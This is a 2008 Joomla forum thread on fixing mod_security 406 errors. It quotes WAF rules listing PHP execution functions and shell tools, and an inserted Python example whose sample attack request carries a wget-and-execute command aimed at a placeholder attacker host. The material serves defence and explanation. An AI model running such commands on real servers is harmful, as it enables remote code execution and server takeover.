The Joomla! Forum ™



PostPosted: Tue Jan 22, 2008 12:06 pm
Joomla! Apprentice
Joined: Fri Oct 20, 2006 9:29 am
Posts: 16
Hi,

On a fresh 1.5 installation I cannot save the global configuration:

Not Acceptable
An appropriate representation of the requested resource /joomladir/administrator/index.php could not be found on this server.

I don't have any problem with Joomla 1.0.13 installations on the same server; it happens only with version 1.5.0 stable.

Thanks


PostPosted: Sat Jan 26, 2008 10:07 pm
Joomla! Explorer
Joined: Mon May 08, 2006 7:39 pm
Posts: 280
Location: North Vancouver
I'm having the exact same issue. Joomla 1.5


PostPosted: Sat Jan 26, 2008 10:15 pm
Joomla! Apprentice
Joined: Fri Oct 20, 2006 9:29 am
Posts: 16
The problem is caused if the server is protected against "xmlrpc" bad requests. It is caused by mod_security and the following rule, which UNFORTUNATELY has to be disabled in order for the Joomla 1.5 configuration to be saved:

Code:
SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"


Of course, by disabling the rule above we open a security issue, as it can be used to wget something to /tmp and then execute a binary, probably to root the server.


PostPosted: Sun Jan 27, 2008 7:08 pm
Joomla! Explorer
Joined: Mon May 08, 2006 7:39 pm
Posts: 280
Location: North Vancouver
Strats..

Can you point to the file I need to access the code you found? I'd like to see if disabling this helps. Of course I'd suspect that the development team is either aware of this or needs to be made aware...

Thanks for the tip.


PostPosted: Sun Jan 27, 2008 7:13 pm
Joomla! Apprentice
Joined: Fri Oct 20, 2006 9:29 am
Posts: 16
GooRu wrote:
Strats..

Can you point to the file I need to access the code you found? I'd like to see if disabling this helps. Of course I'd suspect that the development team is either aware of this or needs to be made aware...

Thanks for the tip.



You need to edit myrules.conf inside /usr/local/apache/conf/js_modsecurity/
(of course you must have server root access):

#SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"

I don't know if developers are aware of this issue.

EDIT:
The problem is that inside configuration.php there is an entry "$xmlrpc_server", which makes mod_security see it as an attack.

Definitely a developer has to look into that, because I don't think that server admins are willing to disable a security rule against "xmlrpc" attacks.


Last edited by Strats on Sun Jan 27, 2008 8:00 pm, edited 1 time in total.

PostPosted: Sun Jan 27, 2008 8:09 pm
Joomla! Exemplar
Joined: Thu Aug 18, 2005 8:43 pm
Posts: 7687
Location: New York
You should disable it.

_________________
So we must fix our vision not merely on the negative expulsion of war, but upon the positive affirmation of peace. MLK 1964.
http://officialjoomlabook.com Get it at http://www.joomla.org/joomla-press-official-books.html Buy a book, support Joomla!.


PostPosted: Sun Jan 27, 2008 8:10 pm
Joomla! Master
Joined: Thu Aug 18, 2005 10:41 am
Posts: 15729
Devs are informed about this thread.

_________________
Regards Robin

http://www.linkedin.com/in/robinmuilwijk - http://twitter.com/i_robin


PostPosted: Sun Jan 27, 2008 8:36 pm
Joomla! Ace
Joined: Sat Aug 20, 2005 12:32 pm
Posts: 1105
Location: Weymouth, UK
mcsmom wrote:
You should disable it.


THAT IS THE WORST ADVICE I HAVE EVER READ ON THESE FORUMS!!

Furthermore, not every Joomla user has root access to turn off mod_security or modify its rules.

While I appreciate that not every server will have mod_security installed, the latest rules that I would recommend (from gotroot.com) are quoted below and ensure almost all active attacks against a site using xmlrpc are filtered.

Code:
#MTS
#XML-RPC generic attack sigs
SecRule REQUEST_HEADERS "^Content-Type\: application/xml" chain
SecRule REQUEST_BODY "(\<xml|\<.*xml)" chain
SecRule REQUEST_BODY "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;" chain
SecRule REQUEST_BODY "methodCall\>"

#Specific XML-RPC attacks on xmlrpc.php
SecRule REQUEST_URI "(xmlrpc|xmlrpc.*)\.php" chain
SecRule REQUEST_BODY "(\<xml|\<.*xml)" chain
SecRule REQUEST_BODY "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

#Too generic, unless you know you won't see this in any of the fields of an XMLRPC message on your system
#SecRule REQUEST_URI "/xmlrpc\.php" chain
#SecRule "(cd|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)"

#XML-RPC SQL injection generic signature
SecRule REQUEST_URI "(xmlrpc|xmlrpc_.*)\.php" chain
SecRule REQUEST_BODY  "<methodName>.*</methodName>.*<value><string>.*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view).*methodName\>"





Quote:
You need to edit myrules.conf inside /usr/local/apache/conf/js_modsecurity/


Not always the correct path - on cPanel boxes it's different and depends on the Apache/mod_security version:
/etc/httpd/conf/modsec2.user.conf
/etc/httpd/conf/modsec.user.conf


I would recommend that you change (if you can, or suggest this forum post to your web hosting company) your single line

Quote:
SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"


with the rules quoted above - this will filter almost all exploits "seen" in real life and also allow Joomla 1.5 to save (actually it falls over on the REQUEST_BODY part).



AND IF YOU CANNOT GET YOUR mod_security settings changed:

Then you will need to rename every instance of xmlrpc_server in the Joomla 1.5 code - very easy to do with a PHP editor like Zend or Eclipse - just search and replace with something like "xserver" - there are only 22 occurrences in 12 files for the word: xmlrpc_server

I hope this is a more helpful post :-)

_________________
Phil Taylor - Full Time Joomla/PHP Expert
Blue Flame IT Ltd.
-- http://fix.myjoomla.com/ Same day commercial fixes for Joomla sites worldwide
-- http://www.phil-taylor.com/


PostPosted: Sun Jan 27, 2008 8:42 pm
Joomla! Apprentice
Joined: Fri Oct 20, 2006 9:29 am
Posts: 16
Thanks a lot Phil, finally someone gave the proper attention!


PostPosted: Sun Jan 27, 2008 8:50 pm
Joomla! Ace
Joined: Sat Aug 20, 2005 12:32 pm
Posts: 1105
Location: Weymouth, UK
Strats wrote:
Thanks a lot Phil, finally someone gave the proper attention!


You're welcome

Thinking this through - if you continue to use the rule you currently have you will never be able to use the xml-rpc plugin/features of Joomla 1.5 (Although I know of no component that actually uses this at the moment)

_________________
Phil Taylor - Full Time Joomla/PHP Expert
Blue Flame IT Ltd.
-- http://fix.myjoomla.com/ Same day commercial fixes for Joomla sites worldwide
-- http://www.phil-taylor.com/


PostPosted: Sun Jan 27, 2008 9:12 pm
Joomla! Ace
Joined: Fri Aug 12, 2005 2:45 am
Posts: 1916
Location: Toowoomba, Australia
Phil, I don't know that some of those rules will work.

The path for the XML-RPC server is /xmlrpc/index.php, or just /xmlrpc/

Rules would also need to be aware of SEF URLs like:

foobar.com/joomla/help/xmlrpc.html

There are also a couple of simple defenses:

a) Make sure the configuration setting for the XML-RPC server is "off" (xmlrpc_server = 0)
b) Make sure any XML-RPC plugins are disabled.
c) Delete the /xmlrpc/ folder altogether

So am I understanding correctly, the rule:

SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"

says bounce the page if you find xmlrpc in the URI or in the body of the request?  If that's the case it's not a well crafted rule as it would disallow many valid pages.  For instance you wouldn't be able to write an article on using an XML-RPC server.

_________________
Andrew Eddie - Tweet @AndrewEddie
<><
http://learn.theartofjoomla.com - Joomla 1.6 training videos!
http://www.kiva.org/team/joomla - Got Joomla for free? Pay it forward and help fight poverty.
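To make the trade-off in the posts above concrete, here is a small Python model of how mod_security decides on these rules. It is an added example, not code from this thread, from Joomla or from mod_security: it treats a chain as "every rule must match", models REQUEST_HEADERS as one "Name: value" string per header, applies no transformations such as URL decoding, and runs three constructed requests (a Joomla 1.5 Global Configuration save whose body carries xmlrpc_server=0, an ordinary article that mentions XML-RPC, and an XML-RPC call carrying a PHP system() call) through the single-substring rule and the two gotroot chains quoted earlier, with their patterns copied into Python regex form.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

Rule = Tuple[str, str]   # (variable spec such as "REQUEST_URI|REQUEST_BODY", regex)
Chain = List[Rule]       # every rule in a chain must match for the request to be blocked


@dataclass
class Request:
    """The three request variables the rules in the thread inspect."""
    uri: str
    headers: Dict[str, str]
    body: str

    def variables(self, spec: str) -> List[str]:
        # "A|B" means the regex is tried against A and against B.
        # REQUEST_HEADERS is modelled as one "Name: value" string per header
        # (an assumption that simplifies mod_security's collection semantics).
        values: List[str] = []
        for name in spec.split("|"):
            if name == "REQUEST_URI":
                values.append(self.uri)
            elif name == "REQUEST_BODY":
                values.append(self.body)
            elif name == "REQUEST_HEADERS":
                values.extend(f"{k}: {v}" for k, v in self.headers.items())
            else:
                raise ValueError(f"unsupported variable {name}")
        return values


def chain_matches(chain: Chain, req: Request) -> bool:
    """A chain fires only if every rule in it matches (no transformations applied)."""
    return all(any(re.search(pattern, value) for value in req.variables(spec))
               for spec, pattern in chain)


def blocked_by(rulesets: Dict[str, Chain], req: Request) -> List[str]:
    """Names of the chains that would answer this request with 406."""
    return [name for name, chain in rulesets.items() if chain_matches(chain, req)]


# The hosting company's one-line rule from the thread: any "xmlrpc" in URI or body.
NAIVE_SUBSTRING: Chain = [("REQUEST_URI|REQUEST_BODY", r"xmlrpc")]

# PHP execution-function signature shared by the gotroot chains quoted above.
PHP_EXEC = (r"(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open"
            r"|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close"
            r"|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo"
            r"|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;")

GENERIC_XMLRPC_ATTACK: Chain = [
    ("REQUEST_HEADERS", r"^Content-Type\: application/xml"),
    ("REQUEST_BODY", r"(\<xml|\<.*xml)"),
    ("REQUEST_BODY", PHP_EXEC),
    ("REQUEST_BODY", r"methodCall\>"),
]

# Phil's second version: match the URI on "xmlrpc" without requiring ".php".
XMLRPC_URI_ATTACK: Chain = [
    ("REQUEST_URI", r"xmlrpc"),
    ("REQUEST_BODY", r"(\<xml|\<.*xml)"),
    ("REQUEST_BODY", PHP_EXEC),
]

RULESETS: Dict[str, Chain] = {
    "naive xmlrpc substring": NAIVE_SUBSTRING,
    "generic XML-RPC attack chain": GENERIC_XMLRPC_ATTACK,
    "xmlrpc URI attack chain": XMLRPC_URI_ATTACK,
}

# Constructed sample traffic (not captured from a real site).
FORM = {"Content-Type": "application/x-www-form-urlencoded"}

# Joomla 1.5 Global Configuration save: the body carries the xmlrpc_server field.
CONFIG_SAVE = Request(
    uri="/joomladir/administrator/index.php", headers=FORM,
    body="option=com_config&task=save&sitename=Demo+Site&offline=0"
         "&xmlrpc_server=0&mailfrom=admin%40example.invalid")

# An ordinary article that merely talks about XML-RPC.
ARTICLE_SAVE = Request(
    uri="/joomladir/administrator/index.php", headers=FORM,
    body="option=com_content&task=save&title=Using+an+XML-RPC+server"
         "&introtext=Point+your+client+at+%2Fxmlrpc%2Findex.php")

# An XML-RPC call smuggling a PHP system() call in a string parameter.
XMLRPC_ATTACK = Request(
    uri="/joomladir/xmlrpc/index.php", headers={"Content-Type": "application/xml"},
    body='<?xml version="1.0"?><methodCall><methodName>demo.method</methodName>'
         '<params><param><value><string>\'); system("wget http://attacker.invalid/x'
         ' -O /tmp/x; /tmp/x");</string></value></param></params></methodCall>')


if __name__ == "__main__":
    for label, req in (("config save", CONFIG_SAVE), ("article save", ARTICLE_SAVE),
                       ("XML-RPC attack", XMLRPC_ATTACK)):
        hits = blocked_by(RULESETS, req)
        print(f"{label:15s} -> " + ("406 by: " + ", ".join(hits) if hits else "allowed"))
```

Running it, the configuration save and the article are refused only by the one-line substring rule, while the request carrying system() is caught by all three chains; that is the false-positive versus detection gap the posts above argue about. Real mod_security applies transformations before matching and its rules use POSIX regex syntax, so this models the matching logic, not a drop-in test harness.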


PostPosted: Sun Jan 27, 2008 9:32 pm
Joomla! Ace
Joined: Sat Aug 20, 2005 12:32 pm
Posts: 1105
Location: Weymouth, UK
masterchief wrote:
Phil, I don't know that some of those rules will work.

The path for the XML-RPC server is /xmlrpc/index.php, or just /xmlrpc/

Rules would also need to be aware of SEF URLs like:

foobar.com/joomla/help/xmlrpc.html

There are also a couple of simple defenses:

a) Make sure the configuration setting for the XML-RPC server is "off" (xmlrpc_server = 0)
b) Make sure any XML-RPC plugins are disabled.
c) Delete the /xmlrpc/ folder altogether

So am I understanding correctly, the rule:

SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"

says bounce the page if you find xmlrpc in the URI or in the body of the request?  If that's the case it's not a well crafted rule as it would disallow many valid pages.  For instance you wouldn't be able to write an article on using an XML-RPC server.


Hi Andrew

The original post was about the saving of Joomla Global Configuration and not about preventing attacks by XMLRPC :-) I guess you scanned it like we all have to when we have loads to reply to.

The rules from gotroot.com are generic xmlrpc rules, they are not designed to stop all xmlrpc traffic, but are designed to stop [BAD] xmlrpc traffic

You are right that only the first rule would help with attacks directed at Joomla's specific xmlrpc system - the other three at the moment would not - but simply removing \.php in the last three would mean they get tested against Joomla xmlrpc urls.

So back to the original posters problem.  I agree that the rule that he has posted is a badly crafted rule - but from the sounds of it, it was forced upon him by a web hosting company.


Here are the actual rules that *should* work on the above (left this to last as large quotes in forum posts are a pain):

Quote:
#MTS
#XML-RPC generic attack sigs
SecRule REQUEST_HEADERS "^Content-Type\: application/xml" chain
SecRule REQUEST_BODY "(\<xml|\<.*xml)" chain
SecRule REQUEST_BODY "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;" chain
SecRule REQUEST_BODY "methodCall\>"

#Specific XML-RPC attacks
SecRule REQUEST_URI "xmlrpc" chain
SecRule REQUEST_BODY "(\<xml|\<.*xml)" chain
SecRule REQUEST_BODY "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

#Too generic, unless you know what you are doing you won't see this in any of the fields of an XMLRPC message on your system
#SecRule REQUEST_URI "xmlrpc" chain
#SecRule "(cd|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)"

#XML-RPC SQL injection generic signature
SecRule REQUEST_URI "xmlrpc" chain
SecRule REQUEST_BODY "<methodName>.*</methodName>.*<value><string>.*(select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |,]+[[:space:]](from|into|table|database|index|view).*methodName\>"

_________________
Phil Taylor - Full Time Joomla/PHP Expert
Blue Flame IT Ltd.
-- http://fix.myjoomla.com/ Same day commercial fixes for Joomla sites worldwide
-- http://www.phil-taylor.com/


PostPosted: Thu Feb 21, 2008 8:07 pm
Joomla! Apprentice
Joined: Fri Sep 16, 2005 9:12 pm
Posts: 33
can anyone post a reply in English please that we mere mortals can understand?

I have done a fresh install of 1.5 and as it stands it is unusable, as all attempts to save end up with this HTTP 406 error, whether it is global config, new sections, or content. Back to 1.0 for me it seems.


PostPosted: Thu Feb 21, 2008 9:26 pm
Joomla! Ace
Joined: Sat Aug 20, 2005 12:32 pm
Posts: 1105
Location: Weymouth, UK
youngwilly wrote:
can anyone post a reply in English please that we mere mortals can understand?

I have done a fresh install of 1.5 and as it stands it is unusable, as all attempts to save end up with this HTTP 406 error, whether it is global config, new sections, or content. Back to 1.0 for me it seems.


In English: There is nothing you can do unless you are the server administrator or hosting company.

You could disable mod_security filtering by using a .htaccess override BUT I DO NOT RECOMMEND THAT

You could disable mod_security filtering by using a .htaccess override on the administrator folder ONLY - BUT I DO NOT RECOMMEND THAT - but that might be a quick temp fix for you.

_________________
Phil Taylor - Full Time Joomla/PHP Expert
Blue Flame IT Ltd.
-- http://fix.myjoomla.com/ Same day commercial fixes for Joomla sites worldwide
-- http://www.phil-taylor.com/


PostPosted: Thu Feb 21, 2008 9:28 pm
Joomla! Master
Joined: Fri Aug 12, 2005 12:38 am
Posts: 13163
Location: Sydney - Australia
Sometimes using certain strings in passwords can also cause mod_security to flag the post.

_________________
Brad Baker - Follow me on Google+
http://www.rochen.com - Joomla! Hosting, the correct way.
http://www.joomlatutorials.com <-- Joomla Help
..somewhere in this hospital the anguished oink of a pig man cries out for help..


PostPosted: Fri Feb 22, 2008 3:08 am
Joomla! Exemplar
Joined: Thu Aug 18, 2005 8:43 pm
Posts: 7687
Location: New York
Whoa, I never read this thread again, but I didn't mean disable mod_security, though that was certainly unclear. I think I posted right in the middle of dealing with the xmlrpc issue.

_________________
So we must fix our vision not merely on the negative expulsion of war, but upon the positive affirmation of peace. MLK 1964.
http://officialjoomlabook.com Get it at http://www.joomla.org/joomla-press-official-books.html Buy a book, support Joomla!.


PostPosted: Fri Feb 22, 2008 2:23 pm
Joomla! Apprentice
Joined: Fri Sep 16, 2005 9:12 pm
Posts: 33
Quote:
You could disable mod_security filtering by using a .htaccess override on the administrator folder ONLY - BUT I DO NOT RECOMMEND THAT - but that might be a quick temp fix for you.


OK how do I do this as a temporary measure? Can I do this, make my changes to Global Config, etc, then undo the temporary change?

thanks
Brian

PostPosted: Fri Feb 22, 2008 11:51 pm
Joomla! Apprentice
Joined: Fri Sep 16, 2005 9:12 pm
Posts: 33
Strats wrote:
GooRu wrote:
Strats..

Can you point to the file I need to access the code you found? I'd like to see if disabling this helps. Of course I'd suspect that the development team is either aware of this or needs to be made aware...

Thanks for the tip.



You need to edit myrules.conf inside /usr/local/apache/conf/js_modsecurity/
(of course you must have server root access):

#SecRule REQUEST_URI|REQUEST_BODY "xmlrpc"

I don't know if developers are aware of this issue.

EDIT:
The problem is that inside configuration.php there is an entry "$xmlrpc_server", which makes mod_security see it as an attack.

Definitely a developer has to look into that, because I don't think that server admins are willing to disable a security rule against "xmlrpc" attacks.


Can I edit out the "$xmlrpc_server" in configuration.php to prevent this?


PostPosted: Thu Feb 28, 2008 9:27 am
Joomla! Intern
Joined: Fri Sep 02, 2005 9:24 pm
Posts: 53
Hello

Could you provide the code we should put in a .htaccess or php.ini file?
I have no access to the Apache configuration files on my shared hosting account.

Regards


PostPosted: Sat Mar 22, 2008 7:34 pm
Joomla! Fledgling
Joined: Fri Aug 18, 2006 6:07 pm
Posts: 2
Phil, thank you for your advice; however, I replaced all the instances of xmlrpc_server with xserver but still get the same message when trying to save the global configuration?

Since my server admin will not change the rules (and rightfully so) is the only option left to me, to go back to the old version of joomla? :eek:


PostPosted: Fri Apr 04, 2008 7:07 pm
Joomla! Fledgling
Joined: Tue Jun 19, 2007 1:09 pm
Posts: 3
I understand the issue with this, but if I am working around the 406 global config problem, I can easily edit the configuration.php but I can't find any var $ for useractivation etc.

Is there a way to manually tweak any file to set the Allow User Registration flag to yes=1?

I saw earlier versions of the php-dist that had var $useractivation = 1 but it didn't seem to work on 1.5.1.

Any Help would be fantastic
:geek:


PostPosted: Fri Apr 04, 2008 8:28 pm
Joomla! Master
Joined: Fri Aug 12, 2005 12:38 am
Posts: 13163
Location: Sydney - Australia
Simply edit your configuration.php file.

_________________
Brad Baker - Follow me on Google+
http://www.rochen.com - Joomla! Hosting, the correct way.
http://www.joomlatutorials.com <-- Joomla Help
..somewhere in this hospital the anguished oink of a pig man cries out for help..


PostPosted: Mon Apr 21, 2008 11:37 pm
Joomla! Fledgling
Joined: Mon Apr 21, 2008 11:32 pm
Posts: 2
Gee, thanks for the words of wisdom, Brad, but saying
brad wrote:
Simply edit your configuration.php file.
is less than useless help. Edit it to WHAT? Commenting out the xmlrpc_server line, changing it from '0' to '1', none of that made any difference. Please help with useful information - this is a pretty serious issue.

Thanks!


PostPosted: Tue Apr 22, 2008 3:13 pm
Joomla! Ace
Joined: Sat Aug 20, 2005 12:32 pm
Posts: 1105
Location: Weymouth, UK
techdavis wrote:
Gee, thanks for the words of wisdom, Brad, but saying
brad wrote:
Simply edit your configuration.php file.
is less than useless help. Edit it to WHAT? Commenting out the xmlrpc_server line, changing it from '0' to '1', none of that made any difference. Please help with useful information - this is a pretty serious issue.

Thanks!



I think he means, instead of using the GUI (Joomla Admin) to change the values of your global config - manually edit the content of the configuration.php file and change the values in there (and forget the fact that the Joomla Admin exists :-) )

Not easy for a beginner but this is a workaround for those with hosts that are very restrictive...

_________________
Phil Taylor - Full Time Joomla/PHP Expert
Blue Flame IT Ltd.
-- http://fix.myjoomla.com/ Same day commercial fixes for Joomla sites worldwide
-- http://www.phil-taylor.com/


PostPosted: Tue Apr 22, 2008 3:59 pm
Joomla! Fledgling
Joined: Mon Apr 21, 2008 11:32 pm
Posts: 2
Thanks Phil - that was the conclusion I came up with as well, after getting frustrated with the GUI errors. Hopefully this will be addressed by the developers soon. 8)


PostPosted: Sun Mar 15, 2009 5:23 am
Joomla! Fledgling
Joined: Thu Feb 19, 2009 5:29 pm
Posts: 1
I think all the solutions suggested are really complicated. There is a simple way out: directly go and update the table named jos_components (in some cases, depending on your config, the jos part can be named something else). Edit the row with id 31, column "params", and set it to
allowUserRegistration=1
new_usertype=Registered
useractivation=1
frontend_userparams=1


Hope this helps

